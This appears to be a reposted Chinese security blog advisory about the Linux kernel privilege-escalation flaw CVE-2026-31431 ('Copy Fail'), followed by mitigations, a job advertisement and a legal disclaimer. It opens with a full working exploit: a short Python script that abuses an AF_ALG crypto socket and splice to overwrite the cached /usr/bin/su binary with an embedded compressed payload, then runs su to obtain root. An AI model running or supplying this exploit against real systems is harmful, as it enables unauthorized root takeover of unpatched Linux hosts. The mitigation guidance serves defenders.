文章总结： 文档披露Linux内核高危本地提权漏洞CVE-2026-31431（CopyFail），影响2017至2026年4月补丁前的主流发行版。攻击者仅需非特权账户和732字节Python脚本即可获取root权限，覆盖Ubuntu、RHEL等系统。建议立即更新内核补丁a664bf3d603d，或临时禁用algif_aead模块、配置seccomp策略缓解风险。 综合评分： 85 文章分类： 漏洞分析,应急响应,漏洞预警,红队,内网渗透

逆天 Linux 提权漏洞，大洞速修！！！！！

ChinaRan404 ChinaRan404

知攻善防实验室

2026年4月30日 09:33 浙江

在小说阅读器读本章

去阅读

EXP

#!/usr/bin/env python3import&nbsp;os as g,zlib,socket as sdef&nbsp;d(x):return bytes.fromhex(x)def&nbsp;c(f,t,c):&nbsp;a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)&nbsp;try:u.recv(8+t)&nbsp;except:0f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))while&nbsp;i<len(e):c(f,i,e[i:i+4]);i+=4g.system("su")

CVE-2026-31431（称为 “Copy Fail”）

漏洞类型：Linux 内核本地提权（LPE），通过页面缓存写入实现

影响范围：2017 年至 2026 年 4 月补丁前的几乎所有主流 Linux 发行版

利用方式：仅需一个非特权本地用户账户，无需网络访问、无需内核调试功能

攻击载荷：仅 732 字节的 Python 脚本（仅使用 stdlib: os、socket、zlib）

同一脚本无需修改即可拿下 Ubuntu、Amazon Linux、RHEL、SUSE 四大发行版的 root 权限。

缓解措施

1. 打补丁：更新内核到包含 a664bf3d603d 提交的版本

2. 临时措施：禁用 algif_aead 模块（对绝大多数系统没有可测量的影响，不影响 dm-crypt/LUKS、kTLS、SSH 等）

3. 对于不可信工作负载，通过 seccomp 阻止 AF_ALG socket 创建

相关参考链接：

https://copy.fail/

广告时间

国 HVV 招聘

初级研判-中级研判-高级研判

月付10k-30k区间

【腾讯文档】HVV 投递

https://docs.qq.com/form/page/DSUNpWmtNQXhjb1Vm

流程

简历投递->简历初筛->投递厂商->厂商考试->厂商面试->锁定项目

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：知攻善防实验室 ChinaRan404 ChinaRan404《逆天 Linux 提权漏洞，大洞速修！！！！！》